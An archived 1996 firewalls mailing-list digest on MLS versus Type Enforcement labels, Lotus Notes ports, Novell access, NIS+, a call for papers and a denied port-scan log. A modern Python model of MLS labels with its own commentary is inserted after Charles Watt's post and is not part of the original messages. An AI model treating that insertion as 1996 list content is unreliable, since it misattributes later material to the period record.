Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id GAA15402 for firewalls-outgoing; Thu, 1 Feb 1996 06:56:38 -0800 (PST)
Received: from gw3.att.com (gw4.att.com [204.179.186.34]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id GAA15388 for ; Thu, 1 Feb 1996 06:56:33 -0800 (PST)
Received: from vodka.sse.att.com by ig4.att.att.com id AA23420; Thu, 1 Feb 96 09:48:24 EST
Message-Id: <9602011448.AA23420@ig4.att.att.com>
From: mdr@vodka.sse.att.com
Subject: Re: Mandatory protection (was: product selection)
To: t-jont@microsoft.com (Jonathon Tidswell)
Date: Thu, 1 Feb 1996 09:58:00 -0500 (EST)
Cc: IMCEAX400-c=US+3Ba=+20+3Bp=MSFT+3Bo=SOUTHPACIFIC+3Bdda+3ASMTP=firewalls+40greatcircle+2Ecom+3B@red-03-imc.itg.microsoft.com
In-Reply-To: from "Jonathon Tidswell" at Jan 30, 96 11:55:18 pm
X-Mailer: ELM [version 2.4 PL23-upenn2.7]
Mime-Version: 1.0
Content-Transfer-Encoding: 7bit
Content-Type: text/plain; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

JonT asks:

> For those of us who don't have (or have not had) ready access to half a
> dozen "secure" systems.
> Can someone please comment on / answer the following ?
>
> - TE is a MAC mechanism for providing least privilege

Rick Smith could probably speak better on this one. TE appears to be quite
flexible and capable.

> - MLS is a hierarchical labeling scheme for MAC (originally aimed at
> confidentiality)

MLS uses security labels that are composed of two elements:

    a hierarchical level
    a set of categories

The levels and categories are often assigned names such as "proprietary" and
"payroll" respectively. The "proprietary" level means that this information
should be handled according to the rules of the organization for proprietary
information.
Some information could be considered "public" and thus have more relaxed
rules for handling. So "public" and "proprietary" are MLS levels showing
increasing need for protection.

You could have many kinds of information: payroll, capital, medical records,
bids and proposals etc. Some of this information is publicly available (like
earnings reports), some is highly proprietary (like medical records).

A security label identifies information's level and content. So [proprietary,
medical records] means the obvious.

Users are cleared according to their level of trust, and need-to-know. And
data files are carefully labeled. The OS controls the flow of information
from one security label to another by a simple policy:

    Read down, write equal.

This prevents [proprietary, payroll] data from getting mixed up with
[proprietary, medical records] or being released to the [public].

Some programs might need access to *both* payroll and medical records. Such a
program would run with the security label of [proprietary, payroll, medical
records]. It could freely *read* both payroll and medical records, but it
could not *write* to them. In fact every file that it created would bear the
new label [proprietary, payroll, medical records]

As you can see the MLS model is primarily concerned with protecting access to
information. However the model has other uses.

Fortunately, there are a number of MLS systems out there. The implementations
tend to take the MLS model *very* seriously. I believe that these systems are
good choices for firewall implementation because the MLS model can be used to
protect the operating system code from user processes, and to separate
programs into mutually exclusive domains. Plus, why not use existing
technology if it meets the need.
> - B2 systems require 'least privilege' mechanism (in addition to the MLS
> required at B1)

Yep

> - Firewalls seem to be more intuitively served with least privilege than
> with MLS

There are a lot of firewall features that are "intuitively" served via least
privilege. If the mechanism has sufficient granularity, it can control the
ability to create executables, open devices, fork processes etc. It can also
carve "root" into separate administrative roles so that the guy who does your
backups doesn't wind up with unlimited access to your system.

There are also a lot of firewall features that are easily served via MLS. It
can protect the OS code, prevent the creation of trojan horses, control
access to devices and files etc. Although "intuitively" one might think that
MLS only has to do with data labeling.

> Is there a common model or mechanism (other than TE) for least privilege in
> B2 (and above) systems ?

Good question, wish I could answer it. My work has been with B1 systems that
have some B2 and higher features such as some least privilege capabilities
but w/o a general mechanism. USL/Novell/... has been working on a B2 Unix
that has a least privilege mechanism, but I am not aware of any "common
model" used industry wide.
Mark Riggins
Secure Systems Engineering
AT&T Bell Labs

From firewalls-owner Thu Feb 1 08:08:23 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id HAA17267 for firewalls-outgoing; Thu, 1 Feb 1996 07:36:55 -0800 (PST)
Received: from filoli.filoli.com (filoli.com [204.162.0.10]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id HAA17262 for ; Thu, 1 Feb 1996 07:36:51 -0800 (PST)
Received: from sunspot.filoli.com (root@sunspot.filoli.com [204.162.1.17]) by filoli.filoli.com (8.6.10/8.6.9) with ESMTP id HAA10454; Thu, 1 Feb 1996 07:35:54 -0800
Received: from filoli.com (amateur.filoli.com [204.162.1.179]) by sunspot.filoli.com (8.6.12/8.6.9) with ESMTP id HAA27161; Thu, 1 Feb 1996 07:35:54 -0800
Received: by filoli.com (SMI-8.6/SMI-SVR4) id HAA04095; Thu, 1 Feb 1996 07:35:50 -0800
Date: Thu, 1 Feb 1996 07:35:50 -0800
From: dan@filoli.com (Dan Curry)
Message-Id: <199602011535.HAA04095@filoli.com>
To: firewalls@GreatCircle.COM, cbk@starbase.ingress.com
Subject: Re: Lotus Notes replication
X-Sun-Charset: US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

# LOTUS NOTES
lotusnotes      1352/tcp        # Lotus Notes

> From firewalls-owner@GreatCircle.COM Wed Jan 31 22:56:34 1996
> Date: Thu, 1 Feb 1996 01:00:20 -0500
> X-Sender: cbk@ingress.com
> Mime-Version: 1.0
> To: firewalls@GreatCircle.COM
> From: cbk@starbase.ingress.com (Charles B. Kaplan)
> Subject: Lotus Notes replication
>
> Does anyone know what ports Lotus Notes uses when it wants to replicate ?
>
> I want to plug these through my firewall.
>
> Thanks in advance.
>
> -CK
>
>

From firewalls-owner Thu Feb 1 08:10:02 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id HAA16981 for firewalls-outgoing; Thu, 1 Feb 1996 07:31:41 -0800 (PST)
Received: from bb.hks.net (bb.hks.net [199.183.60.11]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id HAA16958 for ; Thu, 1 Feb 1996 07:31:30 -0800 (PST)
Received: from bifrost.paladin.com (router.paladin.com [199.3.129.207]) by bb.hks.net (8.7/8.7-hks1) with SMTP id KAA28021 for ; Thu, 1 Feb 1996 10:27:57 -0500
Received: (from mail@localhost) by bifrost.paladin.com (8.6.12/8.6.9) id KAA02249; Thu, 1 Feb 1996 10:29:50 -0500
Received: from router.paladin.com(199.3.129.207) by bifrost.paladin.com via smap (V1.3) id sma002247; Thu Feb 1 10:29:24 1996
Date: Thu, 1 Feb 1996 10:29:24 -0500 (EST)
From: Chris Woods
To: Ed Woodrick
cc: "firewalls@bb.hks.net"
Subject: RE: Internet-access from Novell
In-Reply-To:
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

On Thu, 1 Feb 1996, Ed Woodrick wrote:

> I know that this is probably a radical answer, but what about using
> Novell access permissions to restrict access to the data? I don't know
> why you would want to go to the trouble of putting up firewalls when
> just a simple permission change should work. It's a lot easier and I
> expect a lot safer to perform security at the operating system level
> than at the network level.

That goes back to the host-level security vs. network-level security. There
are many good reasons why host-level security is not usually feasible, the
biggest being that it is not very scalable. For every new machine you install
and attach to the LAN, you have to implement security measures. One also
assumes that each individual on each host does not have the ability or
knowledge to change the host-level security features.
With network-level security, there is (theoretically) one point of potential
access, which can be (theoretically) maintained by one entity (whether it's
one person or one group of people) who can (again, theoretically) ensure that
security policies are adhered to.

Chris Woods                              Systems Administrator
cjwoods@paladin.com                      Paladin Computing Solutions
617-273-4226                             http://www.paladin.com
"Never underestimate the destructive power of a backhoe." -Brent Chapman

From firewalls-owner Thu Feb 1 08:24:02 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id IAA18961 for firewalls-outgoing; Thu, 1 Feb 1996 08:09:09 -0800 (PST)
Received: from Disclosure.COM (di2.disclosure.com [205.156.194.11]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id IAA18952 for ; Thu, 1 Feb 1996 08:09:00 -0800 (PST)
Received: by Disclosure.COM (4.1/SMI-4.1) id AA03999; Thu, 1 Feb 96 11:11:05 EST
Date: Thu, 1 Feb 1996 11:11:04 -0500 (EST)
From: Scott Barman
To: Finn T Andersen
Cc: firewalls@greatcircle.com
Subject: Re: NIS+
In-Reply-To: <9602011239.ZM14289@eagle.novo.dk>
Message-Id:
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

On Thu, 1 Feb 1996, Finn T Andersen wrote:

> There has been a lot of good information and suggestions about NIS recently,
> however, no one has mentioned anything about NIS+.
> I have heard that NIS+ should be a very secure system, but in fact I have never
> heard about anyone who was using it. Is it available, and on what platforms ?

It's available for Solaris 2.3 and later and only from Sun (or any of their
OEMs/VARs). NIS+ has a real problem interoperating with NIS, which most
people have (if they're using NIS).

scott barman
--
scott barman               DISCLAIMER: I speak to anyone who will listen,
scott@disclosure.com       and I speak only for myself.
barman@ix.netcom.com

"Micro$oft and Windoze/NT will be the cause of the de-evolution of network
security just as the original PC and BASIC was the cause of the de-evolution
of programming." - scott barman

From firewalls-owner Thu Feb 1 08:42:35 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id IAA19831 for firewalls-outgoing; Thu, 1 Feb 1996 08:26:24 -0800 (PST)
Received: from bastion.sware.com (bastion.sware.com [139.131.15.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id IAA19756 for ; Thu, 1 Feb 1996 08:26:03 -0800 (PST)
Received: from shlep.sware.com (shlep.sware.com [139.131.1.14]) by bastion.sware.com (8.6.12/8.6.5) with SMTP id LAA15777 for ; Thu, 1 Feb 1996 11:24:46 -0501
Received: by shlep.sware.com (5.65/2.0) from mordred.sware.com id AA01519; Thu, 1 Feb 96 11:20:58 -0500
Received: by mordred.sware.com (5.65/2.1) id AA16488; Thu, 1 Feb 96 11:26:31 -0500
Message-Id: <9602011626.AA16488@mordred.sware.com>
Subject: Re: Mandatory protection (was: product selection)
To: Firewalls@GreatCircle.COM
Date: Thu, 1 Feb 1996 11:26:31 -0500 (EST)
From: Charles Watt
X-Mailer: ELM [version 2.4 PL21]
Content-Type: text
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

> From: Rick Smith
>
> I think we've covered most of the issues so far in the Type
> Enforcement (TE) versus Multilevel Security (MLS)
> discussion pretty well, but there are two remaining issues
> that need clearing up.
>
> I don't think the unresolved topics arise from ignorance or
> a simple failure to communicate; we have a genuine and
> fully unintended culture clash.
>
> The first is a matter of credibility. Since the relevance
> of anything else I say probably hinges on this, I'll start
> here.
>
> "Does Rick Smith have a clue regarding MLS?"
>
> There are several people at the National Computer Security
> Center and the MISSI Program Office that would be
> astonished by this question.
> Before moving to firewalls I
> was a key designer and the lead systems engineer on the SNS
> Mail Guard, one of the few MLS systems that comes close to
> being a turnkey device (I bring this up as evidence and not
> as a topic of Firewalls discussion - comment privately if
> you must). I've also done a variety of other MLS related
> analysis, design, and implementation tasks. So I do have
> some credentials.
>
> But my background is entirely in high assurance MLS systems.
> Those are systems where MLS has only one meaning: obsessive
> protection of confidentiality in accordance with the Bell
> LaPadula access control rules. Labels define barriers to
> information disclosure, and nothing in the platform
> architecture or services is permitted to compromise
> confidentiality. My statements on what MLS systems can and
> can't do are based on the implications of highly assured
> confidentiality, not on some "strawman" MLS notion nor on
> "misconfigured" MLS systems.

Actually, Rick, your analysis below does show a lack of understanding in the
capabilities of most MLS systems. Your analysis assumes that the MAC labels
enforced by such systems are strictly hierarchical, e.g.:

    Top Secret
    Secret
    Confidential
    Unclassified

But all B1 systems that I am aware of also provide categories or
compartmentalization of levels, creating a two-dimensional array, e.g.

    Classification      Compartments
    --------------      ----------------------------------
    Top Secret          Category A, Category B, ....
    Secret              Category A, Category B, ....
    Confidential        Category A, Category B, ....
    Unclassified        Category A, Category B, ....

The classification is typically an integer. The compartments are usually a
bit set. The actual setup can be considerably more complex than this.
In order for information flow to occur, the reader (or recipient) of the
information must have a label dominating the label of the information, e.g.,

    its classification >= classification of data
    compartment set a proper superset of the data's compartment set

This has considerable implications in your analysis.

> That's where the culture clash comes in. My colleagues in
> this discussion are using B1 MLS systems. These are systems
> where confidentiality protection is not pursued to such an
> extreme. This is *not* intended as a put-down, especially
> in the firewalls environment. Firewalls don't need
> obsessively strong confidentiality. They need integrity
> protection. That's why we put TE in Sidewinder and left out
> MLS -- we see MLS as a confidentiality mechanism and that's
> not what we needed. But if you're using MLS for mandatory
> protection and don't have an obsessively strong
> confidentiality objective, then the picture changes a bit.
>
> Here's how this relates to the last open technical issue:
>
> "Can MLS systems protect Internet servers from one another?"

Of course they can. See below.

> I've always recognized that MLS systems can impose mandatory
> protection barriers between processes by using levels,
> categories, and compartments, but I still concluded "No."
> This is based on my view of high assurance MLS obsessed with
> confidentiality. The argument goes as follows:
>
> 1) Typical Internet TCP/IP traffic does not contain labels.
> 2) The network interface in an MLS system is always assigned
> a label.
> 3) If a network interface receives a packet that does not
> already contain a label, then the packet must be assigned
> the network interface's label.
> 4) All packets sent or received as typical Internet TCP/IP
> traffic carry the same label (from 1, 2, 3). Call this
> label the "Internet Label."
> 5) If two processes have the same label, there is no way to
> enforce mandatory MLS protection between them.
> 6) Every network server process is assigned a label.
> 7) A network server process can only send and receive
> packets if the packets' labels are identical to the label
> of the network server process.

Here your understanding of MLS networking breaks down. Read the existing
standards, such as RFC 1108 or the DoD's Common Security Label spec. An
interface is not controlled by a single label. Rather it is given an
accreditation range, or set of labels, over which it can operate, e.g.,
Outside A, Outside A, Outside AB. You are correct that if it receives an
unlabeled packet, most systems will give it a single default label regardless
of port.

> 8) Any network server process that handles Internet traffic
> must be assigned the "Internet Label" (from 4, 7).

No, it must be assigned any within the accreditation set of the interface.

> 9) All Internet server processes must be assigned the
> "Internet Label" (from 6, 8).

No, they can be assigned different labels.

> 10) You can't enforce MLS between Internet servers (from 5, 9).

Sure you can -- easily.

    Server 1 (label = outside A)         Server 2 (label = outside B)
                |                                    |
                |                                    |
    Interface (default label = outside,
               accreditation set = outside, outside A, outside B)

With the above configuration, both servers can access the external interface.
They can both read/write. They are completely separated by MAC. It is true
that they must bind to a port, but the port space is not protected by any
label, for it does not by itself contain any information. Proper separation
is provided by the underlying protocol stack, which only permits a single
process to bind to any given port.

I'll certainly admit that it isn't the prettiest solution, but it sure works
well. This has been the standard MLS approach for over 7 years, and it is
well documented.

We'll skip the remaining analysis, as it is based on incorrect assumptions.

...
> But the bottom line answer to the question, in the context
> of *firewalls* and the irrelevance to them of a high
> assurance obsession with confidentiality, appears to be
> "Yes, If." IF the vendor puts in the trusted code to
> associate different port numbers with different MLS process
> labels, THEN their firewall *can* enforce mandatory MLS

As shown above, this is not necessary. Most, if not all, MLS vendors already
have these capabilities.

> protection between Internet servers. It's not clear that a
> firewall is "misconfigured" if this degree of protection is
> omitted, but a thorough implementation really should
> include it. So, if you're buying an MLS based firewall,
> look for this feature.
>
> Peace?
>
> Rick.

Now I'm not an expert on Type Enforcement, but we do have a couple of ex-SCC
developers here. We've discussed the pros/cons of TE vs. MLS at length for
quite some time and have come to the conclusion that ANYTHING that can be
done with TE can also be done with MLS and vice versa. Of course the
architectures are different, and some problems fit more naturally with one or
the other approach. But the capabilities are virtually identical,
particularly when applied to firewalls and similar separation problems.

Charles Watt
SecureWare, Inc.
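The label model that Mark Riggins and Charles Watt describe above (a hierarchical level plus a set of compartments, label dominance, the "read down, write equal" policy, and an interface with an accreditation range rather than a single label) is worked through below as a small Python model. This is an added illustration for the thread, not code from SecureWare, AT&T or any MLS product; the names Label, Interface, separation_demo and payroll_demo are mine, dominance is modeled as "level at least as high and compartment set a superset or equal", and an interface is simplified to accept a process whenever its label lies in the accreditation set.

```python
"""Toy model of MLS labels with levels and compartments (Bell-LaPadula style).
Added illustration for this thread, not code from any vendor's MLS system."""
from dataclasses import dataclass
from typing import Dict, FrozenSet


@dataclass(frozen=True)
class Label:
    """An MLS label: an integer classification plus a set of compartments.
    Higher integer = more sensitive (e.g. 0 = public, 1 = proprietary)."""
    level: int
    compartments: FrozenSet[str] = frozenset()

    def dominates(self, other: "Label") -> bool:
        # Classification at least as high AND compartments a superset.
        # Equality is allowed: that is what lets a process read its own files.
        return self.level >= other.level and self.compartments >= other.compartments


def can_read(subject: Label, obj: Label) -> bool:
    """Read down: the subject's label must dominate the object's label."""
    return subject.dominates(obj)


def can_write(subject: Label, obj: Label) -> bool:
    """Write equal (the policy Riggins describes): the object must carry the
    subject's own label, so everything a process creates gets that label."""
    return subject == obj


@dataclass(frozen=True)
class Interface:
    """A network interface with a default label for unlabeled packets and an
    accreditation range: the set of labels it may carry traffic for."""
    default: Label
    accreditation: FrozenSet[Label]

    def accepts(self, process: Label) -> bool:
        """Hypothetical simplification: a process may use the interface only
        if its label is inside the accreditation range."""
        return process in self.accreditation


def separation_demo() -> Dict[str, bool]:
    """Watt's configuration: two servers at 'outside A' and 'outside B' behind
    one interface accredited for {outside, outside A, outside B}."""
    OUTSIDE = 0
    outside = Label(OUTSIDE)                        # the unlabeled "Internet label"
    outside_a = Label(OUTSIDE, frozenset({"A"}))    # server 1
    outside_b = Label(OUTSIDE, frozenset({"B"}))    # server 2
    iface = Interface(default=outside,
                      accreditation=frozenset({outside, outside_a, outside_b}))
    return {
        "server1_uses_iface": iface.accepts(outside_a),
        "server2_uses_iface": iface.accepts(outside_b),
        "server1_reads_unlabeled_packet": can_read(outside_a, iface.default),
        "server1_reads_server2_files": can_read(outside_a, outside_b),
        "server2_writes_server1_files": can_write(outside_b, outside_a),
        "server2_reads_own_files": can_read(outside_b, outside_b),
    }


def payroll_demo() -> Dict[str, bool]:
    """Riggins's example: a program labeled [proprietary, payroll, medical
    records] can read both sets of data but cannot write back into either."""
    PUBLIC, PROPRIETARY = 0, 1
    public = Label(PUBLIC)
    payroll = Label(PROPRIETARY, frozenset({"payroll"}))
    medical = Label(PROPRIETARY, frozenset({"medical records"}))
    program = Label(PROPRIETARY, frozenset({"payroll", "medical records"}))
    return {
        "program_reads_payroll": can_read(program, payroll),
        "program_reads_medical": can_read(program, medical),
        "program_writes_payroll": can_write(program, payroll),
        "payroll_reads_medical": can_read(payroll, medical),
        "payroll_released_to_public": can_write(payroll, public),
        # a payroll-only process cannot read the files the program created
        "payroll_reads_program_output": can_read(payroll, program),
    }


if __name__ == "__main__":
    for name, result in {**separation_demo(), **payroll_demo()}.items():
        print(f"{name:32s} {result}")
```

The two demos show the separation both posters argue for: the two servers share the interface but neither dominates the other's label, so neither can read or write the other's files, and the combined-compartment program in Riggins's example can read payroll and medical data yet every file it writes carries its own wider label, which a payroll-only process does not dominate.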
From firewalls-owner Thu Feb 1 08:53:33 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id IAA20418 for firewalls-outgoing; Thu, 1 Feb 1996 08:42:50 -0800 (PST)
Received: from mailme.hill.com (mailme.hill.com [199.182.20.3]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id IAA20406 for ; Thu, 1 Feb 1996 08:42:43 -0800 (PST)
Received: from mail.hill.com (mail.hill.com [199.182.20.4]) by mailme.hill.com (8.6.9/8.6.9) with SMTP id LAA01554; Thu, 1 Feb 1996 11:16:20 -0500
Received: from cc:Mail by mail.hill.com id AA823197273; Thu, 01 Feb 96 09:25:43 EST
Date: Thu, 01 Feb 96 09:25:43 EST
From: "g.kessler"
Message-Id: <9601018231.AA823197273@mail.hill.com>
To: comp.dcom.cell-relay@indiana.edu (Cell Relay list), comp.dcom.frame-relay@indiana.edu (Frame Relay list), bmwg@harvard.edu, fca@amcc.com, fiber-channel-ext@think.com, firewalls@greatcircle.com, giga-owner@tele.pitt.edu, hippi@think.com, ip-atm@hpl.hp.com, ngtrans@sunroog.eng.sun.com, smds@cnri.reston.va.us, smdstc@nis.cerf.net, smds-users@nas.nasa.gov, aft@unify.com
Subject: Re: Local Computer Network CFP...
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

CALL FOR PAPERS

21st Annual Conference on Local Computer Networks
"The Conference on Practical Leading Edge Computer Networking"
September 29 - October 2, 1996, Minneapolis, Minnesota, USA

Sponsored by: IEEE Computer Society TC - Computer Communications

With the growing trend of personal communications and human central
interfaces, future networks, both at home and in the office, will have very
different characteristics. Wireless networks and multimedia applications
further complicate the system design issue. The number of home offices is
growing for environmental or economic reasons. Is there a system equally good
for both home and office? Or are they so different that a common system
design won't be able to satisfy both? "Networking to/at home and office" will
be the focus of the 21st LCN.
Papers that cover these areas are explicitly sought and will be given
preference.

Sessions are being organized on:

- Internetworking/Routers/Bridges
- Multimedia
- Personal Communications
- User Interfaces
- ATM
- Congestion Control
- Emerging Technology
- System Designs
- Networking to/at home and office
- High Speed Networks
- Wireless Networks
- LANs, MANs and WANs
- Real-time Networks
- High Performance Protocols
- Network Management

Important Dates:

    Submission:   March 14, 1996
    Acceptance:   June 18, 1996
    Camera Copy:  Aug. 1, 1996

For more information, please view the LCN Web page at:
http://www.hill.com/lcn/lcn.html

Information for Authors:

All authors must submit 5 copies of the full technical paper in English by
mail or delivery services. DO NOT SUBMIT COMPLETE PAPERS BY FAX. However,
E-mail submission of a plain postscript file is encouraged. In this case, no
encoding (postscript is ASCII) and no compression is allowed. Further, the
postscript file must be able to print on 8.5"x11" paper. The first page must
contain: title of the paper, authors' names including affiliations, complete
mailing address, telephone and fax numbers, E-mail address, and a 250-word
(maximum) abstract (double spaced) to Shu-Ping Chang, Program Chair, at the
address below:

Dr. Shu-Ping Chang
IBM, Thomas J.
Watson Research Center
30 Saw Mill River Road, H2-C18
Hawthorne, NY 10532 USA
Phone: +1 914 784-7746
Fax: +1 914 784-6318
Internet: spchang@watson.ibm.com

From firewalls-owner Thu Feb 1 08:58:10 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id IAA18718 for firewalls-outgoing; Thu, 1 Feb 1996 08:04:45 -0800 (PST)
Received: from bb.hks.net (bb.hks.net [199.183.60.11]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id IAA18713 for ; Thu, 1 Feb 1996 08:04:39 -0800 (PST)
Received: from Disclosure.COM (di2.disclosure.com [205.156.194.11]) by bb.hks.net (8.7/8.7-hks1) with SMTP id LAA28160 for ; Thu, 1 Feb 1996 11:01:08 -0500
Received: by Disclosure.COM (4.1/SMI-4.1) id AA03983; Thu, 1 Feb 96 11:06:57 EST
Date: Thu, 1 Feb 1996 11:06:55 -0500 (EST)
From: Scott Barman
To: "Andrew K. Bressen"
Cc: firewalls@bb.hks.net
Subject: Re: Internet-access from Novell
In-Reply-To: <4eq1q9$q58@bb.hks.net>
Message-Id:
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

On 1 Feb 1996, Andrew K. Bressen wrote:

>
> I'm confronting the same issue with a client right now,
> only with an added problem... more on that; first, here
> is a summary of what I've seen mentioned here and elsewhere,
> plus pointers to the PC magazine reviews of same:
>
>
> Anybody got any others? Please cc me on replies.

BSDI has a system they call "BSDI Internet Gateway for Novell Networks." You
may want to check them out at http://www.bsdi.com/products/novell/.

scott
--
scott barman               DISCLAIMER: I speak to anyone who will listen,
scott@disclosure.com       and I speak only for myself.
barman@ix.netcom.com

"Micro$oft and Windoze/NT will be the cause of the de-evolution of network
security just as the original PC and BASIC was the cause of the de-evolution
of programming."
- scott barman

From firewalls-owner Thu Feb 1 09:23:32 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id JAA22111 for firewalls-outgoing; Thu, 1 Feb 1996 09:16:51 -0800 (PST)
Received: from netcom4.netcom.com (netcom4.netcom.com [192.100.81.107]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id JAA22105 for ; Thu, 1 Feb 1996 09:16:46 -0800 (PST)
Received: by netcom4.netcom.com (8.6.12/Netcom) id JAA06390; Thu, 1 Feb 1996 09:14:52 -0800
Date: Thu, 1 Feb 1996 09:14:51 -0800 (PST)
From: Leroy Lacy
Subject: Re: Most Secure Unix?
To: Jon Spencer
cc: goertzek@wangfed.com, Firewall List
In-Reply-To: <9601302118.AA02298@tsgops.rtp.dg.com>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Ian: well they are good products. The problem is that the systems are just
TCP/IP firewalls and cost an arm and a leg. Most of the night hawks come in
for around 100K. If we compete with them, we'll always have a good margin.

Leroy

From firewalls-owner Thu Feb 1 09:53:21 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id JAA22909 for firewalls-outgoing; Thu, 1 Feb 1996 09:37:56 -0800 (PST)
Received: from gatekeeper.b400.cbe.ab.ca (gatekeeper.b400.cbe.ab.ca [164.166.2.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id JAA22903 for ; Thu, 1 Feb 1996 09:37:50 -0800 (PST)
Received: (from smap@localhost) by gatekeeper.b400.cbe.ab.ca (8.6.12/8.6.9) id KAA01877 for ; Thu, 1 Feb 1996 10:36:37 -0700
Received: from iss101.b400.cbe.ab.ca(164.166.4.2) by gatekeeper.b400.cbe.ab.ca via smap (V1.3) id sma001871; Thu Feb 1 10:36:34 1996
Received: from net02 (Net02.b400.cbe.ab.ca) by CBE.AB.CA (PMDF V4.3-13 #5915) id <01I0P2GRKWO09PM0FT@CBE.AB.CA>; Thu, 01 Feb 1996 10:38:29 -0700 (MST)
Date: Thu, 01 Feb 1996 10:36:08 -0700
From: netmgr02@cbe.ab.ca (Glen Larwill)
Subject: Scanning from afar...
X-Sender: netmgr02@mail.b400.cbe.ab.ca
To: firewalls@greatcircle.com
Message-id: <01I0P2GRLPLU9PM0FT@CBE.AB.CA>
X-Envelope-to: firewalls@greatcircle.com
MIME-version: 1.0
X-Mailer:
Content-type: text/plain; charset="us-ascii"
Content-transfer-encoding: 7BIT
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Has anyone seen this type of network scanning before? Addresses have been
changed to protect the innocent and the guilty.

Jan 30 11:14:41.922: %SEC-6-IPACCESSLOGP: list 111 denied tcp X.X.143.14(39620) -> X.X.211.227(80), 1 packet
Jan 30 11:14:42.962: %SEC-6-IPACCESSLOGP: list 111 denied tcp X.X.143.14(39621) -> X.X.211.243(80), 1 packet
Jan 30 11:14:44.054: %SEC-6-IPACCESSLOGP: list 111 denied tcp X.X.143.14(39622) -> X.X.211.3(80), 1 packet
Jan 30 11:14:45.070: %SEC-6-IPACCESSLOGP: list 111 denied tcp X.X.143.14(39623) -> X.X.211.19(80), 1 packet
Jan 30 11:14:46.294: %SEC-6-IPACCESSLOGP: list 111 denied tcp X.X.143.14(39624) -> X.X.211.35(80), 1 packet
Jan 30 11:14:46.918: %SEC-6-IPACCESSLOGP: list 111 denied tcp X.X.143.14(39625) -> X.X.211.51(80), 1 packet
Jan 30 11:14:47.922: %SEC-6-IPACCESSLOGP: list 111 denied tcp X.X.143.14(39626) -> X.X.211.67(80), 1 packet
Jan 30 11:14:48.918: %SEC-6-IPACCESSLOGP: list 111 denied tcp X.X.143.14(39627) -> X.X.211.83(80), 1 packet
Jan 30 11:14:49.910: %SEC-6-IPACCESSLOGP: list 111 denied tcp X.X.143.14(39628) -> X.X.211.99(80), 1 packet
Jan 30 11:14:50.922: %SEC-6-IPACCESSLOGP: list 111 denied tcp X.X.143.14(39629) -> X.X.211.115(80), 1 packet
Jan 30 11:14:51.926: %SEC-6-IPACCESSLOGP: list 111 denied tcp X.X.143.14(39630) -> X.X.211.131(80), 1 packet
Jan 30 11:14:52.930: %SEC-6-IPACCESSLOGP: list 111 denied tcp X.X.143.14(39631) -> X.X.211.147(80), 1 packet
Jan 30 11:14:53.918: %SEC-6-IPACCESSLOGP: list 111 denied tcp X.X.143.14(39632) -> X.X.211.163(80), 1 packet
Jan 30 11:14:54.978: %SEC-6-IPACCESSLOGP: list 111 denied tcp X.X.143.14(39633) -> X.X.211.179(80), 1 packet
Jan 30 11:14:55.958: %SEC-6-IPACCESSLOGP: list 111 denied tcp X.X.143.14(39634) -> X.X.211.195(80), 1 packet
Jan 30 11:14:56.934: %SEC-6-IPACCESSLOGP: list 111 denied tcp X.X.143.14(39635) -> X.X.211.211(80), 1 packet
Jan 30 11:19:48.988: %SEC-6-IPACCESSLOGP: list 111 denied tcp X.X.143.14(39621) -> X.X.211.243(80), 1 packet
Jan 30 11:19:48.988: %SEC-6-IPACCESSLOGP: list 111 denied tcp X.X.143.14(39623) -> X.X.211.19(80), 1 packet
Jan 30 11:19:48.992: %SEC-6-IPACCESSLOGP: list 111 denied tcp X.X.143.14(39622) -> X.X.211.3(80), 1 packet
Jan 30 11:19:48.996: %SEC-6-IPACCESSLOGP: list 111 denied tcp X.X.143.14(39627) -> X.X.211.83(80), 1 packet
Jan 30 11:19:48.996: %SEC-6-IPACCESSLOGP: list 111 denied tcp X.X.143.14(39626) -> X.X.211.67(80), 1 packet
Jan 30 11:19:49.000: %SEC-6-IPACCESSLOGP: list 111 denied tcp X.X.143.14(39620) -> X.X.211.227(80), 1 packet
Jan 30 11:19:49.004: %SEC-6-IPACCESSLOGP: list 111 denied tcp X.X.143.14(39624) -> X.X.211.35(80), 1 packet
Jan 30 11:19:49.004: %SEC-6-IPACCESSLOGP: list 111 denied tcp X.X.143.14(39625) -> X.X.211.51(80), 1 packet
Jan 30 11:20:49.024: %SEC-6-IPACCESSLOGP: list 111 denied tcp X.X.143.14(39632) -> X.X.211.163(80), 1 packet
Jan 30 11:20:49.024: %SEC-6-IPACCESSLOGP: list 111 denied tcp X.X.143.14(39635) -> X.X.211.211(80), 1 packet
